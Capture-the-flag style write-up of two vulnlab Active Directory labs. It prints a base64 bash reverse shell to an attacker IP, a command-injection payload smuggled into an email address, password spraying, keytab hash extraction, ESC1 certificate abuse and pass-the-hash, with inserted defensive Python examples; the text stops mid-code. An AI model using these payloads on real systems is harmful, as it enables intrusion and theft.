vulnlab-hybrid

vulnlab hybrid

a medium Active Directory chain

containing one Ubuntu AD-joined PC and a Windows DC

Tools used: keytabextract.py

Nmap enum

# Nmap 7.93 scan initiated Thu Jun 20 10:25:26 2024 as: nmap -Pn -sV -oN ports_hybrid1.txt 10.10.200.5
Nmap scan report for 10.10.200.5
Host is up (0.021s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-20 08:25:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 20 10:26:16 2024 -- 1 IP address (1 host up) scanned in 49.67 seconds


# Nmap 7.93 scan initiated Thu Jun 20 10:27:06 2024 as: nmap -Pn -sV -oN ports_hybrid2.txt 10.10.200.6
Nmap scan report for 10.10.200.6
Host is up (0.020s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
25/tcp   open  smtp     Postfix smtpd
80/tcp   open  http     nginx 1.18.0 (Ubuntu)
110/tcp  open  pop3     Dovecot pop3d
111/tcp  open  rpcbind  2-4 (RPC #100000)
143/tcp  open  imap     Dovecot imapd (Ubuntu)
587/tcp  open  smtp     Postfix smtpd
993/tcp  open  ssl/imap Dovecot imapd (Ubuntu)
995/tcp  open  ssl/pop3 Dovecot pop3d
2049/tcp open  nfs_acl  3 (RPC #100227)
Service Info: Host:  mail01.hybrid.vl; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 20 10:27:19 2024 -- 1 IP address (1 host up) scanned in 13.26 seconds


Through NFS enumeration we find

admin@hybrid.vl:Duckling21
peter.turner@hybrid.vl:PeterIstToll!

For the mailing part in Roundcube I used

bash -i >& /dev/tcp/10.8.2.138/2222 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIuMTM4LzIyMjIgMD4mMQ==

admin&echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjIuMTM4LzIyMjIgMD4mMQ==${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash&@hybrid.vl

BloodHound Enum

┌──(puck㉿kali)-[~/vulnlab/hybrid]
bloodhound-python -d 'hybrid.vl' -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' -gc 'dc01.hybrid.vl' -ns 10.10.200.5 --zip

Certipy-AD: find vulnerable certificate templates

┌──(puck㉿kali)-[~/vulnlab/hybrid]
certipy-ad find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -vulnerable -stdout -dc-ip 10.10.200.5      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : hybrid-DC01-CA
    DNS Name                            : dc01.hybrid.vl
    Certificate Subject                 : CN=hybrid-DC01-CA, DC=hybrid, DC=vl
    Certificate Serial Number           : 6FC0F9512195A183421AB786C3012BC6
    Certificate Validity Start          : 2023-06-17 14:04:39+00:00
    Certificate Validity End            : 2123-06-17 14:14:39+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : HYBRID.VL\Administrators
      Access Rights
        ManageCertificates              : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        ManageCa                        : HYBRID.VL\Administrators
                                          HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
        Enroll                          : HYBRID.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : HybridComputers
    Display Name                        : HybridComputers
    Certificate Authorities             : hybrid-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 100 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Domain Computers
                                          HYBRID.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : HYBRID.VL\Administrator
        Write Owner Principals          : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Dacl Principals           : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
        Write Property Principals       : HYBRID.VL\Domain Admins
                                          HYBRID.VL\Enterprise Admins
                                          HYBRID.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

We find an ESC1 vulnerability that Domain Computers can use, and I have a domain-joined machine account, MAIL01$. Enumerating further on MAIL01 I found /etc/krb5.keytab, a file used to authenticate to Kerberos without any human interaction and without storing the plaintext password (it holds the account's derived Kerberos keys instead).
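As an added example (not code from the write-up or from Certipy), the following Python checks a template's properties, as printed in the Certipy output above, against the ESC1 preconditions and reports which principals in the enrollment list make it reachable. The HybridComputers dict is transcribed from that output; BROAD_PRINCIPALS (what counts as "anyone can enroll") is an assumption.

```python
"""Check certificate template properties for the ESC1 preconditions.

Added example; this is neither the write-up's nor Certipy's code. The
sample template is transcribed from the HybridComputers output above;
BROAD_PRINCIPALS (what counts as "anyone can enroll") is an assumption.
"""

BROAD_PRINCIPALS = {"Authenticated Users", "Domain Users",
                    "Domain Computers", "Everyone"}  # assumption

# EKUs that let the resulting certificate authenticate a principal.
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}

# Transcribed from the Certipy output for HybridComputers (constructed dict).
HYBRID_COMPUTERS = {
    "name": "HybridComputers",
    "enabled": True,
    "enrollee_supplies_subject": True,
    "extended_key_usage": ["Client Authentication", "Server Authentication"],
    "requires_manager_approval": False,
    "authorized_signatures_required": 0,
    "enrollment_rights": ["HYBRID.VL\\Domain Admins",
                          "HYBRID.VL\\Domain Computers",
                          "HYBRID.VL\\Enterprise Admins"],
}


def allows_authentication(ekus):
    """A certificate with no EKU extension is valid for any purpose."""
    return not ekus or bool(set(ekus) & AUTH_EKUS)


def esc1_findings(template):
    """Return one finding per broad principal that can abuse the template
    for ESC1, or an empty list when any precondition is missing."""
    if not template["enabled"]:
        return []
    if not template["enrollee_supplies_subject"]:
        return []
    if not allows_authentication(template["extended_key_usage"]):
        return []
    if template["requires_manager_approval"]:
        return []
    if template["authorized_signatures_required"] > 0:
        return []
    # Strip the "DOMAIN\" prefix so the names compare against BROAD_PRINCIPALS.
    enrollers = {p.split("\\", 1)[-1] for p in template["enrollment_rights"]}
    return [f"{template['name']}: '{p}' can enroll, enrollee supplies subject "
            f"and template allows client authentication"
            for p in sorted(enrollers & BROAD_PRINCIPALS)]


def hardened(template):
    """Return a copy with the two template-level fixes applied: the CA
    builds the subject from AD, and issuance needs manager approval."""
    fixed = dict(template)
    fixed["enrollee_supplies_subject"] = False
    fixed["requires_manager_approval"] = True
    return fixed


if __name__ == "__main__":
    for line in esc1_findings(HYBRID_COMPUTERS):
        print("[!] ESC1", line)
    print("after hardening:", esc1_findings(hardened(HYBRID_COMPUTERS)))
```

Note that the CA-level "User Specified SAN: Disabled" line in the output is a different control (the CA's EDITF_ATTRIBUTESUBJECTALTNAME2 setting); ESC1 comes from the template's own EnrolleeSuppliesSubject flag, which is why the check above looks at the template and not at the CA.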

Transferred the “krb5.keytab” file to my Kali machine and used keytabextract.py to extract the MAIL01$ principal and its key hashes.

python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : HYBRID.VL
        SERVICE PRINCIPAL : MAIL01$/
        NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
        AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
        AES-128 HASH : 3a732454c95bcef529167b6bea476458
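The audit a defender would run on the same file, as an added example (not the write-up's code and not keytabextract.py): parse the MIT keytab format, list each principal's kvno and enctype without printing key bytes, and flag RC4/DES keys and loose file permissions. The sample keytab is constructed in-script to mirror the MAIL01$ entry above, with dummy key bytes.

```python
"""Audit a MIT-format krb5.keytab: list principals, kvno and enctypes, flag
legacy (RC4/DES) keys and loose file permissions, without printing key bytes.

Added example; not part of the write-up or of keytabextract.py. The sample
keytab is built in-script to mirror the MAIL01$ entry above (RC4, AES256 and
AES128 keys); the key bytes are dummy values.
"""
import os
import stat
import struct

ENCTYPE_NAMES = {
    1: "des-cbc-crc", 3: "des-cbc-md5", 23: "rc4-hmac",
    17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96",
    19: "aes128-cts-hmac-sha256-128", 20: "aes256-cts-hmac-sha384-192",
}
# An RC4 key is the account's NT hash; DES is broken. Both should be retired.
WEAK_ENCTYPES = {1, 3, 23}


def build_keytab(entries):
    """Serialise (realm, components, kvno, enctype, key) tuples as a v2 keytab
    (magic 0x0502, big-endian, each record prefixed by its int32 length)."""
    out = bytearray(b"\x05\x02")
    for realm, components, kvno, enctype, key in entries:
        rec = bytearray(struct.pack(">H", len(components)))
        for s in (realm, *components):          # realm precedes the components
            b = s.encode()
            rec += struct.pack(">H", len(b)) + b
        rec += struct.pack(">IIB", 1, 0, kvno & 0xFF)       # name_type, timestamp, vno8
        rec += struct.pack(">HH", enctype, len(key)) + key  # keyblock
        rec += struct.pack(">I", kvno)                       # 32-bit vno
        out += struct.pack(">i", len(rec)) + rec
    return bytes(out)


def parse_keytab(data):
    """Return [{principal, kvno, enctype}] for each live record; the key
    bytes are deliberately not returned."""
    if data[:2] != b"\x05\x02":
        raise ValueError("only keytab format version 0x0502 is supported")
    pos, entries = 2, []
    while pos + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, pos)
        pos += 4
        if size < 0:                 # negative length marks a deleted slot
            pos += -size
            continue
        rec, off = data[pos:pos + size], 0
        (ncomp,) = struct.unpack_from(">H", rec, off)
        off += 2
        strings = []
        for _ in range(ncomp + 1):   # realm, then each principal component
            (n,) = struct.unpack_from(">H", rec, off)
            off += 2
            strings.append(rec[off:off + n].decode(errors="replace"))
            off += n
        realm, comps = strings[0], strings[1:]
        _name_type, _timestamp, vno8 = struct.unpack_from(">IIB", rec, off)
        off += 9
        enctype, klen = struct.unpack_from(">HH", rec, off)
        off += 4 + klen              # skip over the key material
        kvno = vno8
        if off + 4 <= size:          # optional 32-bit vno wins when non-zero
            (vno32,) = struct.unpack_from(">I", rec, off)
            kvno = vno32 or vno8
        entries.append({"principal": "/".join(comps) + "@" + realm,
                        "kvno": kvno, "enctype": enctype})
        pos += size
    return entries


def key_findings(entries):
    """Flag weak enctypes; the finding names the enctype, never the key."""
    return [f"{e['principal']} (kvno {e['kvno']}) has a "
            f"{ENCTYPE_NAMES.get(e['enctype'], e['enctype'])} key"
            for e in entries if e["enctype"] in WEAK_ENCTYPES]


def permission_findings(mode, uid):
    """A keytab should be root-owned and readable by root only (0600)."""
    findings = []
    if uid != 0:
        findings.append(f"owner uid is {uid}, expected 0")
    if stat.S_IMODE(mode) & 0o077:
        findings.append(f"mode is {stat.S_IMODE(mode):04o}, expected 0600")
    return findings


def audit_file(path):
    """Run both checks against a keytab on disk."""
    st = os.stat(path)
    with open(path, "rb") as f:
        entries = parse_keytab(f.read())
    return key_findings(entries) + permission_findings(st.st_mode, st.st_uid)


# Constructed sample mirroring the MAIL01$ keytab above; dummy key bytes.
SAMPLE_KEYTAB = build_keytab([
    ("HYBRID.VL", ["MAIL01$"], 2, 23, bytes(16)),
    ("HYBRID.VL", ["MAIL01$"], 2, 18, bytes(32)),
    ("HYBRID.VL", ["MAIL01$"], 2, 17, bytes(16)),
])

if __name__ == "__main__":
    for e in parse_keytab(SAMPLE_KEYTAB):
        print(e["principal"], e["kvno"], ENCTYPE_NAMES.get(e["enctype"]))
    print(key_findings(parse_keytab(SAMPLE_KEYTAB)))
    print(permission_findings(0o100644, 1000))
```

The two findings map to the two fixes: keep the keytab root-owned with mode 0600 so a local foothold cannot read it, and restrict the computer account to AES (msDS-SupportedEncryptionTypes) so that even a leaked keytab no longer contains the RC4 key that doubles as the NT hash.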


Certipy: request a certificate as MAIL01$ with the administrator UPN

certipy-ad req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.200.5" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'DC01.hybrid.vl' -key-size 4096 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'


┌──(puck㉿kali)-[~/vulnlab/hybrid]
certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.200.5      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>


┌──(puck㉿kali)-[~/vulnlab/hybrid]
evil-winrm -i hybrid.vl -u 'Administrator' -H '60<REDACTED>dc' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
hybrid\administrator


vulnlab-sweep

vulnlab sweep

a medium Windows machine

Tools used: crackmapexec, bloodhound-python, sshesame, evil-winrm

Nmap scan

# Nmap 7.93 scan initiated Mon Jun 17 13:02:37 2024 as: nmap -Pn -sV -oN ports_sweep.txt 10.10.80.128
Nmap scan report for 10.10.80.128
Host is up (0.022s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
81/tcp   open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp   open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-06-17 17:02:48Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
5357/tcp open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 17 13:03:09 2024 -- 1 IP address (1 host up) scanned in 32.44 seconds

Enumerate

Enumerate SMB shares as Guest and brute-force RIDs

┌──(puck㉿kali)-[~/vulnlab/sweep]
crackmapexec smb 10.10.80.128 -u 'Guest' -p '' --shares --rid-brute
SMB         10.10.80.128    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.80.128    445    INVENTORY        [+] sweep.vl\Guest: 
SMB         10.10.80.128    445    INVENTORY        [+] Enumerated shares
SMB         10.10.80.128    445    INVENTORY        Share           Permissions     Remark
SMB         10.10.80.128    445    INVENTORY        -----           -----------     ------
SMB         10.10.80.128    445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.80.128    445    INVENTORY        C$                              Default share
SMB         10.10.80.128    445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.80.128    445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.80.128    445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.80.128    445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.80.128    445    INVENTORY        SYSVOL                          Logon server share 
SMB         10.10.80.128    445    INVENTORY        [+] Brute forcing RIDs
SMB         10.10.80.128    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

Make a users file and spray it with username=password

cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt
crackmapexec smb sweep.vl -u users.txt -p users.txt --shares --continue-on-success

BloodHound Enum

┌──(puck㉿kali)-[~/vulnlab/sweep]
bloodhound-python -d sweep.vl -c All -dc inventory.sweep.vl -ns 10.10.80.128 -u intern -p intern --zip    
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 06S
INFO: Compressing output into 20240617132345_bloodhound.zip

Log in to the Lansweeper web UI at http://sweep.vl:81/ as user intern, go to Scanning -> Scanning credentials (note that saved credentials are in use), then Scanning -> Scanning targets -> add an IP range target covering the vulnlab VPN IP, and select the saved credentials for it.


On the Kali machine run an SSH honeypot. I used sshesame; the only thing that needs changing is the sshesame.yaml file:

set listen_address: 10.8.2.138:22 [in my case]

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ ./sshesame-linux-amd64 --config sshesame.yaml
INFO 2024/06/17 14:52:02 No host keys configured, using keys at "/home/puck/.local/share/sshesame"
INFO 2024/06/17 14:52:02 Listening on 10.8.2.138:22
WARNING 2024/06/17 14:53:40 Failed to accept connection: Failed to establish SSH server connection: EOF
WARNING 2024/06/17 14:53:46 Failed to accept connection: Failed to establish SSH server connection: ssh: disconnect, reason 11: Session closed
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "0|5<REDACTED>" accepted
2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] session requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] closed
2024/06/17 14:53:46 [10.10.80.128:51633] connection closed
2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected
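What the honeypot log shows is a scanning product handing its stored domain credential to whatever address is added as a target. As an added example (not the write-up's code and not part of sshesame), the following Python turns sshesame-style log lines into the credential-exposure report an analyst would keep: per source, which username was accepted, with which client, and what it tried to run, with the password itself withheld. The log lines are a constructed sample modelled on the output above (fake password, plus a second source that never authenticated); the regexes assume sshesame's "[ip:port] message" line layout.

```python
"""Turn SSH honeypot (sshesame-style) log lines into a credential-exposure
report, withholding the password itself.

Added example; not part of the write-up or of sshesame. SAMPLE_LOG is a
constructed sample modelled on the output above (fake password, fake second
source); the regexes assume sshesame's "[ip:port] message" line layout.
"""
import re
from collections import OrderedDict

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \[(?P<src>[^\]]+)\] (?P<msg>.*)$")
AUTH_RE = re.compile(
    r'authentication for user "(?P<user>[^"]*)" with password "(?P<pw>[^"]*)" accepted')
VERSION_RE = re.compile(r'connection with client version "(?P<ver>[^"]*)" established')
CMD_RE = re.compile(r'\[channel \d+\] command "(?P<cmd>[^"]*)" requested')

# Constructed sample; the password is a placeholder, not a real credential.
SAMPLE_LOG = """\
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "Sample-Pa55-not-real" accepted
2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] session requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] closed
2024/06/17 14:53:46 [10.10.80.128:51633] connection closed
2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 15:01:02 [192.0.2.10:40001] authentication for user "root" without credentials rejected
2024/06/17 15:01:02 [192.0.2.10:40001] connection closed
"""


def sessions(log_text):
    """Group lines by [src:port]; each session records the accepted username,
    the password length (never the password), the client and the commands."""
    out = OrderedDict()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                  # INFO/WARNING lines carry no [src:port]
        s = out.setdefault(m["src"], {"source": m["src"], "first_seen": m["ts"],
                                      "user": None, "password_len": 0,
                                      "client": None, "commands": []})
        msg = m["msg"]
        if a := AUTH_RE.search(msg):
            s["user"], s["password_len"] = a["user"], len(a["pw"])
        elif v := VERSION_RE.search(msg):
            s["client"] = v["ver"]
        elif c := CMD_RE.search(msg):
            s["commands"].append(c["cmd"])
    return list(out.values())


def disclosures(log_text):
    """Only sessions in which a password was accepted leaked a credential."""
    return [s for s in sessions(log_text) if s["user"] is not None]


def report(log_text):
    """One line per disclosed credential, suitable for an incident note."""
    return [f"{s['first_seen']} {s['source']} sent a {s['password_len']}-char "
            f"password for '{s['user']}' using {s['client']}; ran {s['commands']}"
            for s in disclosures(log_text)]


if __name__ == "__main__":
    for line in report(SAMPLE_LOG):
        print(line)
```

Every disclosure in the report is a password that must be rotated. The structural fix is on the scanner side: a dedicated least-privilege scanning account, scan targets restricted to the inventory's own ranges, and no reuse of that account for anything that grants a WinRM or admin session.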

Log on now to http://sweep.vl:81/Default.aspx as user svc_inventory_lnx.

From there you can continue with the extra privileges this account has,

or take the simpler route after adding svc_inventory_lnx to the “Lansweeper Admins” group.

Unintended way: https://github.com/Yeeb1/SharpLansweeperDecrypt

But first, as BloodHound suggests:

Full control of a group allows you to directly modify group membership of the group.

Use samba’s net tool to add the user to the target group. The credentials can be supplied in cleartext or prompted interactively if omitted from the command line:

┌──(puck㉿kali)-[~/vulnlab/sweep]
net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx -S inventory.sweep.vl
Password for [SWEEP\svc_inventory_lnx]:
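The group change above lands on the DC as a Windows Security event (4728 for a global group such as Lansweeper Admins, 4732 for a local group, 4756 for a universal group), and the pattern that GenericAll-on-group abuse produces is an account adding itself. As an added example (not the write-up's code, nor BloodHound's or Samba's), the following Python runs that detection over constructed event dicts shaped like the Security log fields; WATCHED_GROUPS is an assumption about which groups matter in this domain.

```python
"""Alert on additions to sensitive AD groups from Windows Security events
(4728/4732/4756: member added to a security-enabled group), and single out
self-additions, the pattern a GenericAll-on-group abuse produces.

Added example; not part of the write-up, BloodHound or Samba. SAMPLE_EVENTS
are constructed dicts using the Security log's field names; WATCHED_GROUPS
is an assumption about which groups matter in this domain.
"""
import re

GROUP_ADD_EVENTS = {4728: "global", 4732: "local", 4756: "universal"}
WATCHED_GROUPS = {"domain admins", "enterprise admins", "administrators",
                  "lansweeper admins"}  # assumption

# Constructed events: a self-add to a watched group, a benign add to an
# unwatched group, an admin adding someone else to a watched local group,
# and an unrelated logon event.
SAMPLE_EVENTS = [
    {"EventID": 4728, "SubjectDomainName": "SWEEP",
     "SubjectUserName": "svc_inventory_lnx",
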